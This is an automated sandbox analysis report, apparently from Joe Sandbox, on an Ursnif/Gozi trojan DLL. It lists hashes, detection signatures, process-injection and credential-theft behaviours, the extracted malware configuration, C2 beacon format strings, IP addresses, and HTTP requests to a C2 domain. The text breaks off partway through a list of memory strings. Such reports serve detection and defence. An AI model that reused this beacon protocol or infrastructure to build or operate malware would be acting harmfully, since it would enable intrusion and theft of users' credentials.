Analysis Report 5fd885c499439tar.dll

Overview

General Information

Sample Name:	5fd885c499439tar.dll
Analysis ID:	330591
MD5:	dde0277221cabab1df0e1cccf6a125b2
SHA1:	a7d375672ae47f087185c78a444487aa656c8eb5
SHA256:	0fb4779661fe23fdcd79c77fc74e721b637b496abe2eb26da28d12055af7b458
Tags:	dllgoziisfbursnif
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a COM Internet Explorer object

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

PE file has a writeable .text section

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to get notified if a device is plugged in / out

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Found malware configuration

Source: regsvr32.exe.4540.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@424505hh", "dns": "424505", "version": "250167", "uptime": "185", "crc": "2", "id": "4343", "user": "ef15d01308f8d2d8cdc8873a31eb82f6", "soft": "3"}

Multi AV Scanner detection for submitted file

Source: 5fd885c499439tar.dll	Virustotal: Detection: 18%			Perma Link
Source: 5fd885c499439tar.dll	ReversingLabs: Detection: 17%

Machine Learning detection for sample

Source: 5fd885c499439tar.dll

Joe Sandbox ML: detected

Spreading:

Contains functionality to get notified if a device is plugged in / out

Source: C:\Windows\explorer.exe

Code function: 30_2_04E0174C RegisterDeviceNotificationA,

30_2_04E0174C

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_04FA32BA
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEA85C FindFirstFileW,DeleteFileW,FindNextFileW,	30_2_04DEA85C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0C34 FindFirstFileW,	30_2_04DF0C34
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	30_2_04E00180

Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44
Source: Joe Sandbox View	IP Address: 172.217.22.66 172.217.22.66

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd

Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54

Source: global traffic	HTTP traffic detected: GET /images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAnACS3mfT/L8UY8eM5OH2UEUf/YkINfq3G1re2fm3O_2/Bm50wSCja/z2jV3OYUZHUlZjtC6nrq/EjBj_2BKXD5RuU2KuhV/Cl0uV3h6LO61AkcuYZIVPE/IwiDB_2Fh5ocS/vj9JcGyf/6k71ht.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: loogerblog.xyzConnection: Keep-AliveCookie: PHPSESSID=jk7j02809o01qf4vm1q8i24ab4; lang=en
Source: global traffic	HTTP traffic detected: GET /images/mbvAWlXhGgjVcTCfFjQ/3O2AqJHvXl_2F3rHmST_2F/JBzJ8PgEHj9az/YhLHOgEV/FDnk_2BI6y_2FNZ1SYC0DHX/yz_2FidSfI/ISjXdHdSruWXI8x4L/I9bnuo4yasJ3/EeDt6cIikbB/1cEqD7MX_2Frsy/QkskFGS9_2BRFwpkzEev_/2FdOjUmi3y2iP97w/gNY3W1_2FvHzBhL/aaNiZHe0/y.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4
Source: global traffic	HTTP traffic detected: GET /images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2F9/LlGO2SSA0NV0T/hSQO_2BH/cC6AH5VKEVWx8JPacUwAYFJ/hgtk8WIB3K/d_2BdLS2yTOt6Dg4V/0VLl0wtt1zqh/gtyvfsYSOv2/OI80MTVkGXkXTK/hTK1aCHhr3hGK_2B_2Bhy/9cV8P8A2W8lNQ3ZP/mR3nBi4b/B.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4

Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 3656 equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000017.00000003.520930888.0000028A7B721000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000025.00000003.525110655.0000000004E24000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micro
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/favicon.ico
Source: explorer.exe, 0000001E.00000000.499102380.0000000008455000.00000004.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAn
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnf
Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
